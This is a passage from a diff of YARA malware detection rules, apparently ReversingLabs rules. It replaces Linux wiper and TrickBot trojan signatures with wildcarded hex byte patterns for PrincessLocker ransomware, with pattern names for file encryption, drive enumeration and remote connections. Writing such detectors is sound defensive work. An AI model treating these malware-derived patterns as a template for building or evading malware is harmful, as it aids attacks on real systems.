5F 5D - C3 8D 45 ?? BE ?? ?? ?? ?? 89 44 24 ?? 89 74 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 4D ?? - 8B 55 ?? C7 45 ?? ?? ?? ?? ?? 85 C9 89 55 ?? 74 ?? 8D 75 ?? 8D B6 ?? ?? ?? ?? 8D BF - ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ?? - ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 01 D0 39 45 - ?? 89 45 ?? 77 ?? 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? C7 45 - ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 75 ?? EB ?? 31 C9 89 4C 24 ?? 8B 45 ?? 89 - 1C 24 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 7C 24 ?? 89 1C 24 89 44 24 ?? E8 - ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 76 ?? B8 ?? ?? ?? ?? 89 74 24 - ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C - 24 E8 ?? ?? ?? ?? 80 7D ?? ?? 75 ?? A1 ?? ?? ?? ?? 89 7D ?? 89 45 ?? 8B 45 ?? 89 45 - ?? 8D 45 ?? 89 44 24 ?? B8 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ?? - 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ?? 31 FF 89 1C - 24 E8 ?? ?? ?? ?? 31 C0 89 44 24 ?? 89 7C 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 75 ?? C7 - 45 ?? ?? ?? ?? ?? 85 F6 74 ?? 8D 75 ?? 8D 76 ?? B9 ?? ?? ?? ?? 89 74 24 ?? 89 4C 24 - ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 77 ?? 89 1C 24 - E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 + $enum_directories_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 + 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 + 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 } - $destroy_files_using_overwrite = { - 55 89 E5 83 EC ?? 89 5D ?? 8B 5D ?? 8D 45 ?? 89 75 ?? 89 7D ?? C7 45 ?? ?? ?? ?? ?? - C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 5D ?? 8B 75 - ?? 8B 7D ?? 89 EC 5D C3 + $enum_directories_p2 = { + 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 + 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? + ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 } - $redundant_reboot_attempts = { - C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? - ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F - 84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 85 C0 0F - 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 8D 76 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 - 24 E8 ?? ?? ?? ?? 31 D2 83 C4 ?? 89 D0 59 5B 5E 5F 5D 8D 61 ?? C3 + $enum_directories_p3 = { + 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? + 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 + ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? 90 83 7F ?? ?? 8B 5F ?? 72 ?? 8B 37 EB ?? 8B F7 83 7D ?? ?? 8D + 45 ?? 8B D3 0F 43 45 ?? 3B CB 0F 42 D1 85 D2 74 ?? 83 EA ?? 72 ?? 8D 9B ?? ?? ?? ?? + 8B 08 3B 0E 75 ?? 83 C0 ?? 83 C6 ?? 83 EA ?? 73 ?? 83 FA ?? 74 ?? 8A 08 3A 0E 75 ?? + 83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA ?? 74 ?? 8A 48 ?? 3A 4E ?? 75 ?? 83 FA + ?? 74 ?? 8A 40 ?? 3A 46 ?? 74 ?? 1B C0 83 C8 ?? EB ?? 33 C0 8B 4D ?? 85 C0 75 ?? 3B + CB 73 ?? 83 C8 ?? EB ?? 33 C0 3B CB 0F 95 C0 85 C0 0F 94 C0 84 C0 75 ?? 8B 85 ?? ?? + ?? ?? 83 C7 ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? B3 ?? EB ?? 32 DB 68 + ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? + 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E + 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 33 FF C6 45 ?? ?? 83 7D ?? ?? 8D 45 ?? 6A + ?? 0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? + 0F 43 45 ?? 8D 8D ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8B + 94 0D ?? ?? ?? ?? 85 D2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 39 BC 05 ?? ?? + ?? ?? 0F 85 ?? ?? ?? ?? F6 C2 ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 03 C8 8D 45 ?? + 50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? C6 45 ?? ?? 8B F0 + 85 C9 74 ?? 8B 11 FF 52 ?? 85 C0 74 ?? 8B 10 8B C8 6A ?? FF 12 8B 06 8B CE 6A ?? 8B + 40 ?? FF D0 88 45 ?? 8D 45 ?? FF 75 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 76 ?? EB ?? 8D A4 24 + ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8D 4D ?? 0F 43 45 ?? 83 7D ?? ?? 0F 43 4D ?? 33 D2 + } + $encrypt_files_p2 = { + 0F BE 1C 30 8B C7 F7 75 ?? 8A 0C 0A 0F BE C1 03 C3 3D ?? ?? ?? ?? 7C ?? 25 ?? ?? ?? + ?? 79 ?? 48 0D ?? ?? ?? ?? 40 EB ?? 02 D9 0F B6 C3 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 46 83 C4 ?? 47 3B 75 ?? 72 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 8B 48 ?? F6 84 0D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? + ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 72 + ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D + ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C6 45 ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D + ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $enum_drives_p1 = { + 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? + ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 + } + $enum_drives_p2 = { + E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? + ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 + 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D + 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 + ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 } condition: - uint32(0)==0x464C457F and ($destroy_files_using_ioctls) and ($destroy_files_using_overwrite) and ($redundant_reboot_attempts) + uint16(0)==0x5A4D and (( all of ($enum_directories_p*)) and ( all of ($enum_drives_p*)) and ( all of ($encrypt_files_p*))) } -rule REVERSINGLABS_Win32_Trojan_Trickbot : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Ransomware_Princesslocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects TrickBot trojan." + description = "Yara rule that detects PrincessLocker ransomware." author = "ReversingLabs" - id = "4ed253cc-0398-542b-a2b7-c42a0b9431fb" + id = "b76ef137-aa0b-5fd3-9876-2459cb6535ff" date = "2020-07-15" modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/trojan/Win32.Trojan.TrickBot.yara#L1-L46" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e10f16c70f1ff7cf11d3e25f06e4c5d9e20c51688582d2b51322f768a8e06d7e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.PrincessLocker.yara#L1-L92" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5be4ca3bd0b0afed1d2f3a59e2951d74a8de94c5a4d5a2c6cc29add49eab9ec0" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Trojan" - tc_detection_name = "TrickBot" + tc_detection_type = "Ransomware" + tc_detection_name = "PrincessLocker" tc_detection_factor = 5 importance = 25 strings: - $entry_setup = { - 58 (68 | 8B) [6-8] 59 [1-3] E2 ?? 57 8B (C7 | EC) 8B (C7 | EC) 05 ?? ?? ?? ?? 68 [4-5] - 89 45 [1-2] 8B D7 [3-4] 8B C1 66 AD 85 C0 74 ?? 3B (C1 | C8) (72 | 77) ?? 2B C1 (C1 | D1) - [2-4] 8B CF 03 C8 81 C1 ?? ?? ?? ?? 8B 01 59 03 D0 52 EB ?? 89 45 ?? 8B C5 B9 ?? ?? - ?? ?? C1 E1 ?? 2B C1 8B 00 89 45 ?? 6A ?? 8B D0 59 FF D2 89 68 ?? 6A ?? 8B D0 FF D2 + $encrypt_files = { + 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? + ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 + ?? 50 53 FF D7 6A ?? FF B5 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? + FF B5 ?? ?? ?? ?? FF D6 85 C0 75 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? + 85 C0 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? + 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 53 FF D7 68 ?? ?? ?? + ?? 8D 4D ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 89 9D ?? ?? ?? ?? 85 DB 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D + 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ?? + ?? ?? 8B 30 89 B5 ?? ?? ?? ?? 3B F0 0F 84 ?? ?? ?? ?? 33 C9 C6 45 ?? ?? 6A ?? 51 8D + 46 ?? 66 89 8D ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? + ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? + 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 FF 75 ?? C7 85 ?? ?? + ?? ?? ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? C6 45 ?? ?? 8B CC + 33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 85 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? + C3 C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 68 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 + 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? + 68 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D BD ?? ?? + ?? ?? 6A ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 83 BD + ?? ?? ?? ?? ?? 6A ?? 0F 43 BD ?? ?? ?? ?? 6A ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 + 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? + ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 8B F8 83 FF + ?? 0F 84 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? + ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85 + ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 48 39 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? + 0F B6 C9 0F 46 C8 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 0F B6 C1 6A ?? 50 6A ?? FF + B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5 + ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 FF 15 } - $decrypt_function_snippet = { - 58 8B C8 75 ?? 58 2B F0 50 8B D8 49 75 ?? 59 58 59 5E 5F 5B C3 + $remote_connection_1 = { + 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 84 DB 0F 85 ?? ?? ?? + ?? 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 45 ?? ?? + ?? ?? ?? 66 C7 45 ?? ?? ?? 88 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 8B F0 8D 55 ?? C6 45 ?? ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 56 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 } - $decrypt_function_snippet_wrapper = { - 55 BD ?? ?? ?? ?? 50 51 52 6A ?? FF 45 ?? 8B 45 ?? 59 F7 E1 8D 8D ?? ?? ?? 